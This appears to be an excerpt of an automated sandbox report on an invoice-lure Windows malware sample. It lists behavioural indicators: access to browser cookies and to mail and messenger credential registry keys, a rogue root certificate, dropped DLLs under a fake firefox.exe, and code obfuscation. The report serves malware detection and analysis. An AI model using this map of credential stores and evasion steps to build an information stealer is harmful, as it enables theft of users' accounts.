Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\787A933634DE6FD6F6497A291396B61F2047DF37Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\50001F8708BB02872D097BFAF94D7030CAF9CAF1Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entriesJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\2FC00D105DDC9C4B11E5D8DDE4091512B1EEA3C7Jump to behavior
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\Google\Google Talk\AccountsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\Microsoft\Windows Live MailJump to behavior

Persistence and Installation Behavior:

barindex
Installs new ROOT certificatesShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Drops PE filesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\facture_1398665.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dllJump to dropped file

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress,3_2_004A1A3C
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_004064A8 push 0040650Dh; ret 2_2_00406505
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_004100D8 push 00410140h; ret 2_2_00410138
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040E250 push 0040E27Ch; ret 2_2_0040E274
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00406A50 push 00406A88h; ret 2_2_00406A80
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040DD38 push 0040DD7Bh; ret 2_2_0040DD73
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040B104 push 0040B2B0h; ret 2_2_0040B2A8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040E0D0 push 0040E118h; ret 2_2_0040E110
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00406944 push 00406986h; ret 2_2_0040697E
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00406A94 push 00406AC0h; ret 2_2_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00411618 push 00411645h; ret 2_2_0041163D
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00406A92 push 00406AC0h; ret 2_2_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_004034A8 push eax; ret 2_2_004034E4
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_004064A6 push 0040650Dh; ret 2_2_00406505
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0041157C push 004115FAh; ret 2_2_004115F2
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040D034 push ecx; mov dword ptr [esp], eax2_2_0040D039
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_004064A8 push 0040650Dh; ret 2_1_00406505
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_004100D8 push 00410140h; ret 2_1_00410138
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040E250 push 0040E27Ch; ret 2_1_0040E274
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00406A50 push 00406A88h; ret 2_1_00406A80
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040DD38 push 0040DD7Bh; ret 2_1_0040DD73
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040B104 push 0040B2B0h; ret 2_1_0040B2A8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040E0D0 push 0040E118h; ret 2_1_0040E110
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00406944 push 00406986h; ret 2_1_0040697E
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00406A94 push 00406AC0h; ret 2_1_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00411618 push 00411645h; ret 2_1_0041163D
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00406A92 push 00406AC0h; ret 2_1_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_004034A8 push eax; ret 2_1_004034E4
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_004064A6 push 0040650Dh; ret 2_1_00406505
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0041157C push 004115FAh; ret 2_1_004115F2
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040D034 push ecx; mov dword ptr [esp], eax2_1_0040D039
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00500B48 push 00500BCEh; ret 3_2_00500BC6

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_00405BEC
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_1_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004AD294 FindFirstFileW,GetLastError,3_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,3_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,3_2_004BF43C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_1_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_1_004D4F34
